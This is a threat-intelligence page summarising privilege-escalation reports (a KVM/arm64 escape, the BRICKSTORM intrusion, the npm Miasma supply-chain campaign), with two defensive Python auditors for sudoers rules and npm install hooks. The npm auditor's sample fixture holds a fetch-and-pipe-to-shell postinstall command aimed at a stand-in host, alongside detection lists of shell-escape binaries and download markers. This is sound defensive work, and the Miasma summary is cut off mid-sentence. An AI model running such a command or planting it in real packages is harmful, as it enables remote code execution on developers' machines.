Threats Tagged 't1068'
Threats tagged 't1068', the MITRE ATT&CK technique ID for Exploitation for Privilege Escalation. Each entry below summarizes a report in which an attacker turned a software flaw or misconfiguration into higher privileges.
How to defend ARM64 cloud infrastructure (CVE-2026-46316)
ITScape (CVE-2026-46316) is a guest-to-host escape in the vGIC-ITS emulation of KVM/arm64, disclosed by researcher Hyunwoo Kim. The flaw is a race condition in vgic_its_invalidate_cache() that leads to a double put and a use-after-free, which the guest can turn into host kernel code execution. Because the bug lives in the in-kernel KVM code rather than in QEMU user space, a successful exploit yields host kernel privileges directly, a significant risk for multi-tenant ARM64 cloud hosts. Where the attacker does not already have root inside the guest, the bug can be chained with a local privilege escalation in the guest. Affected kernels are those that contain commit 8201d1028caa but not the fix, commit 13031fb6b835; a checked-out kernel tree can be tested for the fix with git merge-base --is-ancestor 13031fb6b835 HEAD. Two YARA rules were published for detection: one matches hardcoded constants from the proof-of-concept, the other matches the behavioral pattern of its privilege-drop sequence. A rule keyed to PoC constants will not match a reworked exploit, so the behavioral rule is the more durable of the two.
Source: AlienVault OTX General | 06/12/2026, 16:57:58 UTC | Added: 06/15/2026, 18:45:13 UTC
VerdantBamboo: Just Another BRICKSTORM in the Firewall
Chinese threat actor VerdantBamboo compromised a victim organization and its Managed Services Provider over an 18-month period, deploying malware on network edge devices that lacked EDR coverage. The initial breach went through an Egnyte Storage Sync system, where the attackers exploited a sudo misconfiguration to escalate privileges and installed the BRICKSTORM backdoor together with the AGENTPSD fallback implant. The investigation found the MSP's pfSense firewall compromised as well, running a FreeBSD variant of BRICKSTORM. After remediation, VerdantBamboo regained access using stolen firewall credentials, set up custom VPN access and deployed the PLENET backdoor on a Synology NAS, a reminder that remediation has to include rotating credentials on every compromised appliance. The actor used the compromised systems as proxies to reach Microsoft 365 environments while evading security controls. VerdantBamboo showed operational discipline by targeting appliances without EDR capabilities and by using sophisticated malware such as PLENET, compiled with .NET Native AOT to hinder analysis.
Source: AlienVault OTX General | 06/05/2026, 18:07:50 UTC | Added: 06/08/2026, 08:48:39 UTC
Preinstall to persistence: Inside the npm Miasma credential-stealing campaign
Microsoft Threat Intelligence discovered a large-scale npm supply chain attack: 32 malicious packages across more than 90 versions under the @redhat-cloud-services scope. The compromise originated in the RedHatInsights/javascript-clients CI/CD pipeline, which let the attackers publish trojanized packages through the project's legitimate GitHub Actions OIDC workflows, complete with authentic provenance signatures. The implication for defenders is that provenance verification alone would not have caught these versions: an attestation ties a package to a build workflow, not to an uncompromised one. The malicious packages ran a heavily obfuscated 4.29 MB dropper from an npm preinstall hook; it downloaded the Bun JavaScript runtime and launched payloads that harvest credentials for GitHub, npm, AWS, Azure, GCP, HashiCorp Vault, Kubernetes and developer workstations. The malware scraped GitHub Actions runner memory for secrets, escalated privileges using passwordless sudo, exfiltrated the stolen data through GitHub infrastructure, and propagated by compromising further maintainer packages with forged SLSA provenance. The campaign marker "Miasma: The Spreading Blight" was embedded throughout the malicious
Source: AlienVault OTX General | 06/04/2026, 09:19:13 UTC | Added: 06/04/2026, 09:33:36 UTC
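Both the VerdantBamboo entry (a sudo misconfiguration on an Egnyte appliance) and the Miasma entry (passwordless sudo on CI runners) describe the same local escalation path, so the check a practitioner wants is an audit of sudoers rules for passwordless routes to root. The script below is an added example, not code from either report or from Mandiant or Microsoft; it parses sudoers syntax (/etc/sudoers, /etc/sudoers.d/*, or "sudo -l" output normalized to that syntax). The list of shell-escape binaries and the sample rules are constructed for the example and are assumptions, not a complete reference.

```python
"""Audit sudoers-style rules for passwordless privilege escalation (added example)."""
import os
import re
from dataclasses import dataclass

# Programs that give an interactive shell or an arbitrary file write when run as
# root, so NOPASSWD on them is as good as NOPASSWD: ALL. Representative list,
# an assumption for this example rather than an exhaustive catalogue.
SHELL_ESCAPE_BINARIES = {
    "sh", "bash", "zsh", "env", "vim", "vi", "nano", "less", "more", "man",
    "find", "awk", "perl", "python", "python3", "tee", "cp", "mv", "dd", "tar",
}

# who  host = (runas) [TAG:] command[, command ...]
ENTRY_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+?)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<body>.+)$"
)


@dataclass(frozen=True)
class Finding:
    who: str
    severity: str
    reason: str
    line: str


def _logical_lines(text):
    """Yield rule lines with backslash continuations joined and comments dropped."""
    pending = ""
    for raw in text.splitlines():
        line = (pending + " " + raw.strip()).strip() if pending else raw.strip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1].rstrip()
            continue
        if line and not line.startswith("#"):
            yield line
    if pending:
        yield pending


def _commands(body):
    """Split a Cmnd_Spec_List into (nopasswd, command) pairs. A NOPASSWD:/PASSWD:
    tag sticks to every following command in the list until the opposite tag."""
    nopasswd = False
    pairs = []
    for part in body.split(","):
        part = part.strip()
        while (m := re.match(r"([A-Z_]+):\s*", part)):
            if m.group(1) == "NOPASSWD":
                nopasswd = True
            elif m.group(1) == "PASSWD":
                nopasswd = False
            part = part[m.end():]
        if part:
            pairs.append((nopasswd, part))
    return pairs


def audit_sudoers(text):
    """Return Findings for rules that let a user reach root without a password."""
    findings = []
    for line in _logical_lines(text):
        first = line.split()[0]
        if first == "Defaults":
            if "!authenticate" in line:
                findings.append(Finding("Defaults", "critical",
                                        "!authenticate disables password prompts globally", line))
            continue
        if first.endswith("_Alias"):  # User_Alias / Cmnd_Alias / Runas_Alias definitions
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        who = m.group("who")
        for nopasswd, cmd in _commands(m.group("body")):
            prog = os.path.basename(cmd.split()[0])
            if nopasswd and cmd == "ALL":
                sev, why = "critical", "NOPASSWD on ALL: root shell with no password"
            elif nopasswd and prog in SHELL_ESCAPE_BINARIES:
                sev, why = "high", f"NOPASSWD on {prog}: shell/file-write escape"
            elif nopasswd:
                sev, why = "medium", f"NOPASSWD on {cmd}: review for argument/wildcard abuse"
            elif cmd == "ALL":
                sev, why = "info", "unrestricted sudo, password required"
            else:
                continue
            findings.append(Finding(who, sev, why, line))
    return findings


# Constructed sample for the example; not taken from any real host.
SAMPLE_SUDOERS = """\
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%admin   ALL=(ALL) ALL
User_Alias BACKUP = svc_backup
# vim without a password: ':!sh' from the editor is a root shell
deploy   ALL=(root) NOPASSWD: /usr/bin/vim /etc/app/*
# the passwordless-sudo pattern the Miasma payload abused on CI runners
runner   ALL=(ALL) NOPASSWD:ALL
# tags carry across commas until overridden
BACKUP   ALL=(root) NOPASSWD: /usr/bin/rsync, \\
                    /bin/systemctl restart backup, PASSWD: /bin/systemctl stop backup
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity:8}] {f.who:10} {f.reason}")
```

On a live host, feed it the concatenation of /etc/sudoers and /etc/sudoers.d/* (read as root), and treat every "critical" and "high" finding as a standing privilege-escalation path rather than a hardening nicety.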
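The Miasma entry turns on npm lifecycle hooks: a preinstall script ran an oversized obfuscated dropper that fetched a runtime and executed it. The audit below is an added example, not code from Microsoft's report or from the affected project; it walks a node_modules tree, lists every package that declares an install-time hook, and flags hooks whose script file is unusually large or whose command downloads or pipes into an interpreter. The marker list, the size threshold and the sample package tree are constructed assumptions for the example.

```python
"""List installed npm packages that run code at install time (added example)."""
import json
import os
import tempfile

# Lifecycle scripts npm runs automatically during 'npm install' / 'npm ci'.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Command fragments that mean "fetch something and run it" (assumed heuristic).
FETCH_MARKERS = ("curl ", "wget ", "bun ", "| sh", "| bash", "npx ")


def _script_target(cmd, pkg_dir):
    """Return the .js/.cjs/.mjs file inside the package that a hook such as
    'node install.js' runs, or None. Heuristic, an assumption for this example."""
    for tok in cmd.split()[1:]:
        if tok.endswith((".js", ".cjs", ".mjs")):
            cand = os.path.join(pkg_dir, tok)
            if os.path.isfile(cand):
                return cand
    return None


def audit_install_scripts(node_modules, large_bytes=1_000_000):
    """Walk node_modules and report every package with an install-time hook,
    flagging oversized hook scripts and hooks that download or pipe to a shell."""
    findings = []
    for root, _dirs, files in os.walk(node_modules):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(root, "package.json"), encoding="utf-8") as fh:
                pkg = json.load(fh)
        except (OSError, ValueError):
            continue
        if not isinstance(pkg, dict):
            continue
        scripts = pkg.get("scripts") or {}
        hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}
        if not hooks:
            continue
        flags = []
        for hook, cmd in hooks.items():
            target = _script_target(cmd, root)
            if target is not None and os.path.getsize(target) >= large_bytes:
                flags.append(f"{hook} runs a {os.path.getsize(target)}-byte script")
            if any(marker in cmd for marker in FETCH_MARKERS):
                flags.append(f"{hook} downloads or pipes to an interpreter")
        findings.append({
            "name": pkg.get("name", os.path.relpath(root, node_modules)),
            "version": pkg.get("version", "?"),
            "hooks": hooks,
            "flags": flags,
        })
    return findings


def build_sample_tree():
    """Create a constructed node_modules tree in a temp dir (not a real
    package set) and return its path."""
    nm = os.path.join(tempfile.mkdtemp(prefix="nm_audit_"), "node_modules")
    packages = {
        "@acme/safe": {"version": "1.0.0", "scripts": {"test": "jest"}},
        "dropper": {"version": "2.0.0", "scripts": {"preinstall": "node install.js"}},
        "fetcher": {"version": "0.1.0",
                    "scripts": {"postinstall": "curl -s https://example.invalid/x | sh"}},
    }
    for name, meta in packages.items():
        pkg_dir = os.path.join(nm, *name.split("/"))
        os.makedirs(pkg_dir)
        with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
            json.dump({"name": name, **meta}, fh)
    # 200-byte stand-in for the large obfuscated dropper described in the report
    with open(os.path.join(nm, "dropper", "install.js"), "w", encoding="utf-8") as fh:
        fh.write("x" * 200)
    return nm


if __name__ == "__main__":
    tree = build_sample_tree()
    for entry in audit_install_scripts(tree, large_bytes=100):
        print(f"{entry['name']}@{entry['version']}: {entry['hooks']} {entry['flags']}")
```

Run it against a project's node_modules after a fresh install to see which dependencies execute code at install time; in CI, combine it with npm's own switch to stop the hooks from running in the first place (npm ci --ignore-scripts, or npm config set ignore-scripts true), then run needed build steps explicitly for the packages that genuinely require them.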